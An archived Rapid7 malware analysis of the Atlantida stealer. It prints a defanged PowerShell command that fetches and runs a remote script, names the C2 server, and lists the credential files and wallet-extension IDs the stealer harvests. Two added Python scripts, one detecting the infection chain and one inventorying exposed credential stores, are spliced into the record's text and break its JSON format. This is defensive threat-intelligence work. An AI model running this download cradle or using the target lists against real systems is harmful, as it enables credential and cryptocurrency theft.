{
	"id": "cfd43593-98f3-4779-93f7-5579ccdb16dd",
	"created_at": "2026-04-06T00:20:02.587283Z",
	"updated_at": "2026-04-10T13:12:57.698964Z",
	"deleted_at": null,
	"sha1_hash": "b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea",
	"title": "Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2920967,
	"plain_text": "Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2024-01-17 · Archived: 2026-04-05 17:27:02 UTC\r\nRecently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users into downloading a malicious file from a compromised website, and uses several evasion techniques, such as reflective loading and process injection, before the stealer itself is loaded.\r\nAtlantida steals a wide range of login information from software such as Telegram and Steam, data from several offline cryptocurrency wallets, browser-stored data, and data from cryptocurrency wallet browser extensions. It also captures the victim's screen and collects hardware data.\r\nTechnical Analysis\r\nStage 1 - Delivery\r\nThe attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:\r\nhttps://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/\r\nPage 1 of 9\n\nThe decrypted command: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" irm hxxp://166.1.160[.]10/loader.txt | iex\r\nStage 2 - Three levels of in-memory loading\r\nThe executed PowerShell command downloads and executes a next-stage PowerShell script in memory.\r\nThe PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls the DownloadData API function to fetch a Donut injector. Donut is position-independent code that enables in-memory execution of VBScript, JScript, EXE and DLL files, and .NET assemblies.\r\n
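Detection for the delivery chain above, as an added example that is not part of the Rapid7 post: a Python evaluation of process-creation events that keys on the same parent/child relationship as the ABA rule 'Suspicious Process - MSHTA Spawns PowerShell' named later in this post, adds a check for the irm ... | iex download cradle, and flags powershell.exe creating an argument-less RegAsm.exe, the injection target the post names in stage 2 and in its MITRE table. The event field names follow Sysmon Event ID 1; the events themselves are constructed, and the assumption that the injected RegAsm.exe is launched without arguments with powershell.exe as its parent is mine, not a statement from the post.

```python
# Added example (not from the Rapid7 post): detection logic for the mshta -> powershell
# -> RegAsm.exe delivery chain over process-creation events. Field names mirror Sysmon
# Event ID 1 (ProcessId, ParentProcessId, Image, ParentImage, CommandLine); the events
# at the bottom are constructed for this example and are not real telemetry.

MSHTA = 'mshta.exe'
POWERSHELL = {'powershell.exe', 'pwsh.exe'}
REGASM = 'regasm.exe'

# Download-cradle vocabulary. Cmdlets are matched as whole words so that a URL path
# containing the letters irm does not trigger; the WebClient methods are matched as
# substrings because they appear glued to a parenthesis in real command lines.
CRADLE_WORDS = {'irm', 'invoke-restmethod', 'iwr', 'invoke-webrequest', 'curl', 'wget'}
CRADLE_SUBSTRINGS = ('downloadstring', 'downloaddata', 'net.webclient')
EXEC_WORDS = {'iex', 'invoke-expression'}


def image_name(path):
    # Lower-cased basename of a Windows or POSIX path. chr(92) is the backslash; it is
    # written this way only so the snippet contains no literal backslash.
    return path.replace(chr(92), '/').rsplit('/', 1)[-1].lower()


def is_download_cradle(cmdline):
    c = cmdline.lower()
    words = set(c.replace('|', ' ').replace(';', ' ').split())
    has_cradle = bool(words & CRADLE_WORDS) or any(s in c for s in CRADLE_SUBSTRINGS)
    return has_cradle and bool(words & EXEC_WORDS)


def has_no_arguments(cmdline):
    # True when the command line is just the executable. Assumes an unquoted image path
    # without spaces, which holds for the RegAsm.exe path named in the post.
    return len(cmdline.split()) == 1


def ancestry(by_pid, pid, max_depth=8):
    # Image names from pid upwards; stops at an unknown parent, a pid loop or max_depth.
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]['image']))
        pid = by_pid[pid]['ppid']
    return chain


def evaluate(events):
    by_pid = {e['pid']: e for e in events}
    alerts = []
    for e in events:
        img, parent = image_name(e['image']), image_name(e['parent_image'])
        chain = ancestry(by_pid, e['pid'])
        # Rule 1: the relationship behind the ABA rule Suspicious Process - MSHTA Spawns PowerShell.
        if img in POWERSHELL and parent == MSHTA:
            alerts.append({'rule': 'MSHTA Spawns PowerShell', 'pid': e['pid'], 'chain': chain})
        # Rule 2: the irm ... | iex cradle the .hta hands to PowerShell (stage 1 to stage 2).
        if img in POWERSHELL and is_download_cradle(e['cmdline']):
            alerts.append({'rule': 'PowerShell download cradle', 'pid': e['pid'], 'chain': chain})
        # Rule 3 (assumption, not stated in the post): the loader running inside PowerShell
        # creates RegAsm.exe purely as an injection target, so the child carries no
        # arguments and has powershell.exe as its parent; legitimate RegAsm.exe runs
        # carry an assembly path. The chain tells the analyst whether mshta.exe is upstream.
        if img == REGASM and parent in POWERSHELL and has_no_arguments(e['cmdline']):
            alerts.append({'rule': 'PowerShell spawns argument-less RegAsm.exe', 'pid': e['pid'], 'chain': chain})
    return alerts


# Constructed sample events (forward slashes keep the snippet free of backslashes;
# image_name() accepts either separator). The first four mirror the chain in the post,
# the last two are benign controls: an admin script run from Explorer and a RegAsm.exe
# invocation that registers a DLL.
PS = 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'
RA = 'C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegAsm.exe'
SAMPLE_EVENTS = [
    {'pid': 1001, 'ppid': 900, 'image': 'C:/Windows/explorer.exe',
     'parent_image': 'C:/Windows/System32/userinit.exe', 'cmdline': 'C:/Windows/explorer.exe'},
    {'pid': 1002, 'ppid': 1001, 'image': 'C:/Windows/System32/mshta.exe',
     'parent_image': 'C:/Windows/explorer.exe',
     'cmdline': 'C:/Windows/System32/mshta.exe C:/Users/victim/Downloads/ReadEra_v1.4.2.hta'},
    {'pid': 1003, 'ppid': 1002, 'image': PS, 'parent_image': 'C:/Windows/System32/mshta.exe',
     'cmdline': PS + ' irm hxxp://166.1.160[.]10/loader.txt | iex'},
    {'pid': 1004, 'ppid': 1003, 'image': RA, 'parent_image': PS, 'cmdline': RA},
    {'pid': 1005, 'ppid': 1001, 'image': PS, 'parent_image': 'C:/Windows/explorer.exe',
     'cmdline': 'powershell.exe -File C:/Scripts/backup.ps1'},
    {'pid': 1006, 'ppid': 1005, 'image': RA, 'parent_image': PS,
     'cmdline': 'RegAsm.exe /codebase C:/build/MyLib.dll'},
]


if __name__ == '__main__':
    for a in evaluate(SAMPLE_EVENTS):
        print(a['rule'], '| pid', a['pid'], '|', ' <- '.join(a['chain']))
```

Run it directly to print the alerts for the sample events. In a SIEM the three conditions become a parent/child image rule, a command-line rule and a rule on a child image whose argument list is empty; the ancestry walk is what lets the RegAsm.exe alert be raised at higher severity when mshta.exe sits in its parent chain, which is the shape of the chain in this post.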
Next, the Donut shellcode is injected into a newly created “C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe” process using the remote thread injection technique (aka CreateRemoteThread). This technique works by writing shellcode into the address space of another eligible process and creating a thread in that process to run the payload.\r\nStage 3 - Atlantida Stealer\r\nThe Donut injector is used to load the final payload, which in our case is the new Atlantida stealer. It got its name from a string found in the executable.\r\nFirst, the Atlantida stealer captures the entire screen using a combination of the GetDC, CreateCompatibleDC, CreateDIBSection, SelectObject and BitBlt API functions. Next, it checks whether a FileZilla (open source FTP software that lets users transfer files between a local and a remote computer) recent servers file exists. It does that by attempting to open “C:\\Users\\username\\AppData\\Roaming\\FileZilla\\recentservers.xml”; if the file exists, it reads it. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under each wallet path:\r\nThe stealer reads all the files found under the enumerated paths.\r\nNext, it collects the victim's hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files (.txt). It also looks for Binance wallet credentials by enumerating the `C:\\Users\\Username\\AppData\\Roaming\\Binance` directory and reading all JSON files under it.\r\nSteam (video game digital distribution service) configuration and credentials are also of interest to the Atlantida stealer: we observed it enumerating the Steam configuration directory and searching for the following files:\r\n1. Ssfn - Steam Sentry File.\r\n2. Config.vdf - Steam configuration file.\r\n3. Loginusers.vdf - stores the records of previously logged-in Steam accounts.\r\nThe last thing Atlantida harvests is Telegram data. It collects all the data located in “C:\\Users\\Username\\AppData\\Roaming\\Telegram Desktop\\tdata”.\r\nThe stealer now connects to the hardcoded C\u0026C server (45.144.232[.]99). We accessed the hardcoded IP and reached the login page of what we assume is the stealer's control panel, which also had an `Atlantida` title.\r\nNo data is passed to the C\u0026C server at this point and the stealer continues its collection. Unlike many other stealers, Atlantida focuses on only three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofill entries.\r\nOne of the notable functions of the Atlantida stealer is its ability to steal data from Chrome-based browser extensions. Each Chrome-based extension is assigned an “Extension ID”.\r\n
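An added example, not code from the Rapid7 post, that turns the collection stage described above into a scoping script for incident response: it walks a Windows user profile and reports which of the artifacts Atlantida collects (FileZilla recentservers.xml, Binance JSON files, Desktop .txt files, the Telegram tdata folder, the Steam ssfn, config.vdf and loginusers.vdf files, browser credential stores and wallet-extension storage) exist on the host, so the credentials behind them can be rotated. The artifact paths are the ones the post names. The Chromium profile locations and store file names (Login Data, Web Data, Cookies), the Firefox logins.json path, the Steam install root and the Local Extension Settings/<extension id> layout are Chromium, Firefox and Steam conventions assumed here, and the offline-wallet path list did not survive extraction on this page, so it is left out. The extension IDs are a subset copied from the table that follows.

```python
import tempfile
from pathlib import Path

# Added example (not code from the Rapid7 post): report which of the artifacts the stealer
# collects exist under a Windows user profile, to scope credential rotation after an
# infection. The artifact locations named in the post are used as given; the Chromium and
# Firefox profile layout and the Steam install root are conventions assumed here.

# Chrome-extension IDs copied from the post's table (a subset; the table is the full list).
WALLET_EXTENSION_IDS = {
    'nkbihfbeogaeaoehlefnkodbefgpgknn': 'Metamask',
    'bfnaelmomeimhlpmgjnjophhpkkoljpa': 'Phantom',
    'acmacodkjbdgmoleebolmdjonilkdbch': 'Rabby',
    'dmkamcknogkgcdfhhbddcghachkejeap': 'Keplr',
    'hpglfhgfnhbgpjdenjgmdgoeiappafln': 'Guarda',
}
# Chrome and Edge default profiles under the user profile (assumed default install).
CHROMIUM_PROFILES = ('AppData/Local/Google/Chrome/User Data/Default',
                     'AppData/Local/Microsoft/Edge/User Data/Default')
# Chromium SQLite stores for passwords, autofill/credit cards and cookies (old and new cookie path).
CHROMIUM_STORES = ('Login Data', 'Web Data', 'Cookies', 'Network/Cookies')
DEFAULT_STEAM_ROOT = 'C:/Program Files (x86)/Steam'   # assumption: default Steam install


def inventory(profile_root, steam_root=None):
    root = Path(profile_root)
    steam = Path(steam_root or DEFAULT_STEAM_ROOT)
    found = []

    def hit(category, path):
        if path.exists():
            shown = path.relative_to(root) if root in path.parents else path
            found.append((category, str(shown)))

    hit('filezilla', root / 'AppData/Roaming/FileZilla/recentservers.xml')   # hosts, users, passwords
    for p in sorted((root / 'AppData/Roaming/Binance').glob('*.json')):
        hit('binance', p)
    for p in sorted((root / 'Desktop').glob('*.txt')):
        hit('desktop-txt', p)
    hit('telegram-tdata', root / 'AppData/Roaming/Telegram Desktop/tdata')   # session store
    for p in sorted(steam.glob('ssfn*')):                                     # Steam Sentry files
        hit('steam-ssfn', p)
    hit('steam-config', steam / 'config/config.vdf')
    hit('steam-loginusers', steam / 'config/loginusers.vdf')
    for prof in CHROMIUM_PROFILES:
        base = root / prof
        for store in CHROMIUM_STORES:
            hit('browser-store', base / store)
        # Extension-local storage lives in a directory named after the extension ID; this is
        # the lookup the stealer can make from the ID table alone.
        for ext_id, name in WALLET_EXTENSION_IDS.items():
            hit('wallet-ext:' + name, base / 'Local Extension Settings' / ext_id)
    for p in sorted((root / 'AppData/Roaming/Mozilla/Firefox/Profiles').glob('*/logins.json')):
        hit('firefox-logins', p)
    return found


def build_sample_profile(base):
    # Constructed fixture: a fake user profile with some targeted artifacts present.
    base = Path(base)
    for rel in ('AppData/Roaming/FileZilla/recentservers.xml',
                'AppData/Roaming/Binance/app-store.json',
                'Desktop/passwords.txt',
                'AppData/Roaming/Telegram Desktop/tdata/key_datas',
                'AppData/Local/Google/Chrome/User Data/Default/Login Data',
                'AppData/Local/Google/Chrome/User Data/Default/Local Extension Settings/'
                'nkbihfbeogaeaoehlefnkodbefgpgknn/000003.log',
                'AppData/Roaming/Mozilla/Firefox/Profiles/abc123.default-release/logins.json'):
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text('sample')
    return base


def demo():
    # Builds the fixture in a temporary directory, points the Steam root at a path that
    # does not exist, and returns the inventory.
    with tempfile.TemporaryDirectory() as tmp:
        return inventory(build_sample_profile(tmp), steam_root=Path(tmp) / 'no-steam')


if __name__ == '__main__':
    for category, path in demo():
        print(category, path)
```

Point inventory() at a mounted image of the victim's profile (and the real Steam root) to get the list of stores that must be treated as exposed; every wallet-ext entry is a seed phrase or vault that should be assumed stolen, and every browser-store entry means the saved passwords, cookies and cards in that profile need rotation and session invalidation.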
The malware uses this Extension ID to locate and harvest the data stored within each extension's storage. Atlantida harvests data from the following cryptocurrency wallet extensions:\r\nExtension Name | Extension ID\r\nMetamask | nkbihfbeogaeaoehlefnkodbefgpgknn\r\nSollet | fhmfendgdocmcbmfikdcogofphimnkno\r\nBNB chain wallet | fhbohimaelbohpjbbldcngcnapndodjp\r\nPhantom | bfnaelmomeimhlpmgjnjophhpkkoljpa\r\nMetawallet | bkklifkecemccedpkhcebagjpehhabfb\r\nYoroi | ffnbelfdoeiohenkjibnmadjiehjhajb\r\nNami | lpfcbjknijpeeillifnkikgncikgfhdo\r\nFlint | hnhobjmcibchnmglfbldbfabcgaknlkj\r\nCardWallet | apnehcjmnengpnmccpaibjmhhoadaico\r\nGuildwallet | nanjmdknhkinifnkgdcggcfnhdaammmj\r\nTronWallet | pnndplcbkakcplkjnolgbkdgjikjednm\r\nCryptoAirdrops | dhgnlgphgchebgoemcjekedjjbifijid\r\nBitoke | oijajbhmelbcoclnkdmembiacmeghbae\r\nCoin89 | aeachknmefphepccionboohckonoeemg\r\nXDefiWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf\r\nKeplr | dmkamcknogkgcdfhhbddcghachkejeap\r\nFreaksAxie | copjnifcecdedocejpaapepagaodgpbh\r\nOasis | ppdadbejkmjnefldpcdjhnkpbjkikoip\r\nRabby | acmacodkjbdgmoleebolmdjonilkdbch\r\nMathWallet | afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nNiftyWallet | jbdaocneiiinmjbjlgalhcelgbejmnid\r\nGuarda | hpglfhgfnhbgpjdenjgmdgoeiappafln\r\nEQUALWallet | blnieiiffboillknjnepogjhkgnoapac\r\nBitAppWallet | fihkakfobkmkjojpchpfgcmhfjnmnfpi\r\niWallet | kncchdigobghenbbaddojjnnaogfppfj\r\nWombat | amkmjjmmflddogmhpjloimipbofnfjih\r\nMEW CX | nlbmnnijcnlegkjjpcfjclmcfggfefdm\r\nGuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig\r\nSaturn Wallet | cphhlgmgameodnhkjdmkpanlelnlohao\r\nCloverWallet | nhnkbkgjikgcigadomkphalanndcapjk\r\nLiqualityWallet | kpfopkelmapcoipemfendmdcghnegimn\r\nTerraStation | aiifbnbfobpmeekipheeijimdpnlpgpp\r\nAuroWallet | cnmamaachppnkjgnildpdmkaakejnhae\r\nPolymesh Wallet | jojhfeoedkpkglbfimdfabpdfjaoolaf\r\nICONex | flpiciilemghbmfalicajoolhkkenfel\r\nNaboxWallet | nknhiehlklippafakaeklbeglecifhad\r\nKHC | hcflpincpppdclinealmandijcmnkbgn\r\nTemple | ookjlbkiijinhpmnjffcofjonbfbgaoc\r\nTezBox | mnfifefkajgofkcjkemidiaecocnkjeh\r\nCyanoWallet | dkdedlpgdmmkkfjabffeganieamfklkm\r\nByone | nlgbhdfgdhgbiamfdfmbikcdghidoadd\r\nOneKey | infeboajgfhgbjpjbeppbkgnabfdkdaf\r\nLeaf Wallet | cihmoadaighcejopammfbmddcmdekcje\r\nBitClip | ijmpgkjfkbfhoebgogflfebnmejmfbml\r\nNashExtension | onofpnbbkehpmmoabgpcpmigafmmnjhl\r\nHyconLiteClient | bcopgchhojmggmffilplmbdicgaihlkp\r\nWhen the stealer finishes the collection, all data is compressed and sent to the C\u0026C server. Then the malware exits.\r\nRapid7 Customers\r\nFor Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:\r\nSuspicious Process - MSHTA Spawns PowerShell\r\nMITRE ATT\u0026CK Techniques:\r\nTactic | Technique | Details\r\nExecution | User Execution: Malicious File (T1204.002) | A user downloads and executes a malicious .hta file\r\nExecution | Command and Scripting Interpreter: Visual Basic (T1059.005) | The .hta contains a malicious VBScript function\r\nExecution | Command and Scripting Interpreter: PowerShell (T1059.001) | The VBScript executes PowerShell to download a PowerShell script\r\nCommand and Control | Ingress Tool Transfer (T1105) | The PowerShell script downloads an additional .NET loader\r\nDefense Evasion | Reflective Code Loading (T1620) | The PowerShell script executes the loader reflectively\r\nDefense Evasion | Process Injection (T1055) | The .NET loader injects into the RegAsm.exe process\r\nCredential Access | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Atlantida steals stored browser data such as passwords, cookies, tokens, credit cards and autofill entries\r\nCredential Access | Credentials from Password Stores (T1555) | Atlantida steals offline cryptocurrency wallet data and other software data\r\nDiscovery | System Information Discovery (T1082) | Atlantida collects the victim's hardware information\r\nCollection | Screen Capture (T1113) | Atlantida captures the victim's screen\r\nExfiltration | Exfiltration Over C2 Channel (T1041) | Atlantida exfiltrates all collected data\r\nIOCs\r\nIOC | SHA-256 | Notes\r\nReadEra_v1.4.2.hta | 67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8 | Malicious .hta file\r\nhttp://166.1.160[.]10/loader.txt | - | Malicious PowerShell script\r\nhttp://166.1.160[.]10/www_c.bin | f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3 | Stores the .NET loader\r\nhttp://166.1.160[.]10/www.bin | 350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0 | Stores the Donut shellcode\r\nAtlantidaStealer.exe | b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130 | Atlantida stealer\r\n45.144.232[.]99 | - | C\u0026C server\r\nSource: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/"
	],
	"report_names": [
		"whispers-of-atlantida-safeguarding-your-digital-treasure"
	],
	"threat_actors": [],
	"ts_created_at": 1775434802,
	"ts_updated_at": 1775826777,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.pdf",
		"text": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.txt",
		"img": "https://archive.orkl.eu/b6b1ab7e5e739a298c17a9fe60fa3f56a25817ea.jpg"
	}
}